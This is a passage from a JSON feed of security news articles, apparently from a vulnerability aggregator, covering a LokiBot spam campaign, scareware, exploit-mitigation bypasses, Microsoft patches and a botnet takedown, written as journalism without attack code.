", "edition": 1, "modified": "2019-05-28T00:00:00", "published": "2019-05-28T00:00:00", "id": "MYHACK58:62201994299", "href": "http://www.myhack58.com/Article/html/3/62/2019/94299.htm", "title": "Wary of the use of the Office vulnerabilities to spread commercial spyware AgentTesla-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2020-04-10T12:12:46", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "The well-known LokiBot malware has popped up in several malicious spam campaigns [over the past year](<https://threatpost.com/threatlist-ransomware-eks-and-trojans-lead-the-way-in-q3-malware-trends/138433/>), covertly siphoning information from victims' compromised endpoints. Researchers this week are warning of the most recent sighting of the malware, which was recently spotted in spam messages targeting a large U.S. manufacturing company.

Researchers first discovered the campaign on Aug. 21 after an unnamed U.S. semiconductor distributor received a spam email sent to the sales department from a potentially compromised "trusted" sender. The email, purporting to be distributing an attached request for quotation, was actually harboring the prolific trojan LokiBot.

"The attack is pretty straightforward," said Fortinet researchers in a [Tuesday analysis of the attack](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot.html>). "The LokiBot sample has a file size of 286 KB and was recently compiled on Aug 21, which is coincidentally the same date as when the malicious spam was sent…. 
The spam email then encourages the user to open the attachment as the senders' colleague is currently out of office, and at the same time offers the potential victim some assurance that he/she can provide further clarification of the contents within the document if needed."

## Red Flags

Despite the spam email (titled "Urgent Request for Quotation #RFQE67Y54") coming from a trusted sender, there were several tell-tale signs that might give away the email as malicious.

While the email is "simple in appearance," it contained language that appears to be written by a non-native English speaker and contained spelling errors. For instance, the email states, "Please see 'attache'", when referring to an "RFQ" (or a "request for quotation").

![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10083714/lokibot-malspam.png)

Another giveaway is that a closer look at the attached file's information shows it to be curiously named "Dora Explorer Games," a reference to the children's TV heroine from the show "Dora The Explorer", a strange name for a file that purports to be related to manufacturing.

"We don't know if this file info was put in there as a distraction or for reasons unknown to us, as it doesn't make sense to have such a file name targeting a military and government-based contractor," researchers said.

Once opened, the file actually harbors LokiBot malware, which is known for stealing a variety of credentials, including FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials.

## LokiBot Malware

The malware is known for being simple and effective and for its adoption of diverse attachment types. The malware is a commodity in underground markets, with versions selling for as little as $300.

"LokiBot is distributed in various forms, and has been seen in the past being distributed in zipped files along with malicious macros in Microsoft Word and Excel, or leveraging the exploit CVE-2017-11882 (Office Equation Editor) via malicious RTF files," said researchers.

LokiBot is also known to be distributed in sneaky ways, including steganography. Several recent attacks in fact showed the malware [disguised as a .zipx attachment](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) hidden inside a .PNG file that can slip past some email security gateways, or hidden as an [ISO disk image file attachment](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>).

However, in the most recent campaign "this particular sample did not use any steganography as past variants were seen doing," researchers said.

## Connected Spam Campaign

Upon closer investigation, researchers were able to draw loose links between the campaign and a previous spam attack through the IP address.

The IP address of this attack is registered to a webhosting provider in Phoenix, Ariz. (called LeaseWeb USA), which was previously used twice before in malicious spam attacks that occurred in June.

![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10094115/image_753132854.img_.png)

Related June malspam campaign

These earlier attacks targeted a large German bakery in a malicious spam attack trying to lure a victim into downloading an electronic invoice. However, there were key differences between the two spam emails, including language (the previous email was in Chinese).

"Because of the low volume identified, it appears that this IP address may be under the control of one group, and possibly only being used for very targeted attacks," researchers said. "However, we can only assume this – time will provide a better historical snapshot of campaigns using this IP address."

To protect against similar future campaigns, researchers urged organizations to both adopt mail-security solutions and train their employees to look out for spearphishing attempts.

"Since it has been reported that this threat has been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization are made aware of various types of attacks delivered via social engineering," researchers said. "This can be accomplished through regularly-occurring training sessions and impromptu tests using predetermined templates by internal security departments within an organization."
", "modified": "2019-09-10T14:07:03", "published": "2019-09-10T14:07:03", "id": "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "href": "https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/", "type": "threatpost", "title": "U.S. Manufacturer Most Recent Target of LokiBot Malspam Campaign", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:01:58", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Windows 8 isn't yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. 
Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. 
The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad users into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. \n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "modified": "2013-04-17T16:31:18", "published": "2012-11-01T15:32:54", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serious enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. 
ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. 
We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "modified": "2015-06-25T21:13:37", "published": "2015-06-22T15:11:28", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. 
military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. 
\u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique in use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build a ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. \u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. 
It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. \u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "modified": "2014-03-05T20:45:44", "published": "2014-03-05T10:07:31", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[From SearchSecurity (Robert Westervelt)](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>)\n\n[](<https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/>)Microsoft issued an advisory Monday, warning of a new vulnerability in [Office Web Components](<http://www.microsoft.com/technet/security/advisory/973472.mspx>) being actively 
targeted by attackers. The Office Web Components allow users to view spreadsheets, charts and databases on the Web. Microsoft said the vulnerability is in the Spreadsheet ActiveX Control, which is used by Internet Explorer (IE) to display the data in the browser. It is remotely exploitable when a person browses with IE and visits a malicious website. If successfully exploited, an attacker could gain the same user rights as the local user and gain complete control of a system, Microsoft said. [Read the full story](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1361617,00.html>) [SearchSecurity].\n", "modified": "2013-04-17T16:38:54", "published": "2009-07-13T18:53:30", "id": "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "href": "https://threatpost.com/new-flaw-microsoft-office-web-components-under-attack-071309/72911/", "type": "threatpost", "title": "New Flaw in Microsoft Office Web Components Under Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened encryption. 
For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well-funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and JScript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it is also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. Today\u2019s update patches two separate scripting engine memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBScript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. 
\u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there. One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "modified": "2015-10-14T20:03:27", 
"published": "2015-10-13T14:39:57", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later, admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson.\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. 
The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update failed to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>)_ reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. 
They suggest, according to the _Post_ article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services, leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after the fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "modified": "2015-10-02T16:00:39", "published": "2015-09-30T15:22:01", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:36", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Many industries tend to run in identifiable cycles. Financial services, the auto industry, entertainment\u2013they all have cycles. 
Because the security industry isn\u2019t nearly as old as any of these, it hasn\u2019t had much of a chance to establish such cycles. But one seems to be appearing now in the form of renewed criticism and distaste for offensive security research.\n\nThe most recent cycle has been building momentum for some time now, but the jumping off point may have come last month in a talk by Adobe security and privacy chief Brad Arkin. The gist of the talk was that defenders need to focus their energy on making exploitation and attacks more expensive for the bad guys. However that happens\u2013whether it\u2019s through the addition of exploit mitigation technologies, deploying sandboxes or any number of other techniques\u2013raising the cost of attacks should be the priority.\n\n\u201cI would say to the researchers here, work on defense. This is where you\u2019re going to make a difference,\u201d Arkin said. \u201cIf you come up with a new offensive technology, the bad guys will use it.\u201d\n\nThat\u2019s in contrast to the mentality that has prevailed among many software companies and security professionals, who often focus on finding and fixing as many security vulnerabilities as possible. The more bugs you fix, the fewer there are for the attackers to exploit, after all.\n\nThat\u2019s true, of course, but it ignores the fact that the number of total bugs is unknowable and constantly changing. And, it also ignores the fact that many attackers don\u2019t ever bother with zero days; there\u2019s no need. There are so many older vulnerabilities that are lying unpatched on millions and millions of machines out there that it\u2019s a waste of time and money for attackers to look for new ones to exploit. \n\u201cFinancially motivated attackers don\u2019t invest in original research. It\u2019s too expensive these days,\u201d Arkin said. \u201cIt\u2019s pen testers or it\u2019s nation states or the people funded by them. 
That research is done by professional bad guys who have financial horizons that far exceed those of financially motivated bad guys.\u201d\n\nAt last week\u2019s RSA Conference there were more murmurs about the relative value of offensive security research, too. The ongoing debate about the sale of bugs\u2013whether it\u2019s on the black market, the grey area of government sales or to legitimate entities such as the Zero Day Initiative\u2013includes some in the security community who are of the mind that selling vulnerabilities is an inherently shady activity. That discussion came up many times over the course of the week, with a predictable lack of agreement on the subject.\n\nThe problem, opponents of bug sales say, is that regardless of who you sell the bug to, you have no way of knowing against whom that vulnerability might ultimately be used. Some researchers say that\u2019s not their problem; they do the research and make the sale and what happens after that is up to the buyer and out of their hands.\n\nWith the [Pwn2Own contest at CanSecWest](<https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/>) scheduled for later this week, the conversation will likely not just continue, but amp up. Offense is at the fore at CanSecWest, not just during Pwn2Own, but during the conference talks, as well, and rare is the year that a major bug or exploitation technique isn\u2019t revealed there.\n\nThis is not the first time this carousel has spun round this way. Ten or fifteen years ago, as legitimate security research was making its way into the mainstream, many vendors had reactions bordering on anaphylactic shock when a researcher reported a bug to them or went public with it after a lack of response. 
Large software companies, including Microsoft and Oracle, would in some cases refuse to deal with researchers at all or slow the process down to such a point that it was impossible for the researchers to know whether the bug would ever be fixed.\n\nThat led to the brain-melting disclosure debate, which has never gone away, and it also led to the establishment of formal security response programs and organizations at many companies. Later, it helped spur the bug bounty programs run by companies such as Google, Mozilla and others, to reward security researchers who chose to report their findings to the vendors privately.\n\nSo, as often happens, what was old is now new again. But this time it has the added spice of cyberwar hysteria, with legions of highly trained foreign attackers using zero days stolen from some secret NSA database. Maybe that\u2019s happening. Who knows? But what\u2019s definitely happening is that researchers are selling bugs to a variety of people and organizations, some legitimate and others not. And as long as serious bugs can command six figures, that\u2019s never going to end and neither will offensive security research.\n", "modified": "2013-04-17T16:32:42", "published": "2012-03-06T10:20:31", "id": "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "href": "https://threatpost.com/end-offensive-security-research-unlikely-030612/76285/", "type": "threatpost", "title": "An End to Offensive Security Research? 
Unlikely", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. 
[Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "modified": "2013-04-17T16:39:14", "published": "2009-05-19T15:38:56", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:41", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "**UPDATE** \u2013 Calling it the company\u2019s \u201cmost aggressive\u201d botnet operation operation to date, Microsoft has joined with the FBI for a massive disruption of the Citadel botnet.\n\nMore than 1,400 individual botnets associated with the Citadel malware affecting more than five million people in total were disrupted, with cooperation from the Federal Bureau of Investigation and interestingly, a civil seizure warrant issued by the U.S. 
District Court for the Western District of North Carolina.\n\nGroups like the Financial Services \u2013 Information Sharing and Analysis Center (FS-ISAC), NACHA \u2013 The Electronic Payments Association, the American Bankers Association (ABA) and Agari, an email phishing authentication firm, all helped chip in intelligence as well.\n\nWhile this was the seventh botnet operation of its kind coordinated by Microsoft, this is the first time the company has worked with the law enforcement sector to secure a civil seizure warrant to carry out its plans.\n\nRichard Boscovich, the Assistant General Counsel of Microsoft\u2019s Digital Crimes Unit wrote about the operation \u2013 codenamed Operation b54 \u2013 on [the company\u2019s Technet blog](<http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx>) last night claiming the action won\u2019t fully eradicate the Citadel malware but should \u201csignificantly\u201d curb the botnet going forward.\n\n\u201cDue to Citadel\u2019s size and complexity, we do not expect to fully take out all of the botnets in the world using the Citadel malware,\u201d he wrote, \u201chowever, we do expect that this action will significantly disrupt Citadel\u2019s operation.\u201d\n\nTechnical details on the operation are somewhat scant but Microsoft says the operation culminated yesterday after officials from Microsoft, assisted by U.S. Marshalls helped remove servers from two data hosting facilities in New Jersey and Pennsylvania. 
The takedown was set into motion last week after the North Carolina court order successfully cut off communication between the Citadel botnets, 1,462 in total, and their infected machines.\n\nAgari, a Palo Alto-based email phishing authentication firm had a big hand in helping Microsoft obtain the seizure warrant.\n\nWhile the full operation took about a year, Agari spent six of those months poring over phishing emails that were pulling unsuspecting users into the Citadel botnet.\n\nAgari CEO Patrick Peterson described how the company helped monitoring emails that led to the seizure of the servers in Pennsylvania and New Jersey.\n\n\u201cOur whole system is designed to isolate these malicious emails and to get that forensic data for law enforcement, for our customers, for the industry to be able to track the bad guys,\u201d Patterson explained, \u201cIn this case working with our partners, the FBI, Microsoft, FS-ISAC, we were able to customize the focus of that specifically around that Citadel botnet.\u201d\n\nThe company monitored approximately 2.5 million malicious URLs every month and while not every one of those URLs led to the Citadel malware, all of them were pretending to come from a legitimate bank.\n\nAgari is part of FS-ISAC\u2019s Trusted Registry Program, a program dedicated to securing the emails the financial services industry sends out. FS-ISAC reached out to Microsoft about Agari\u2019s wealth of phishing emails and the company joined the investigation from there.\n\n\u201cI think it\u2019s a great 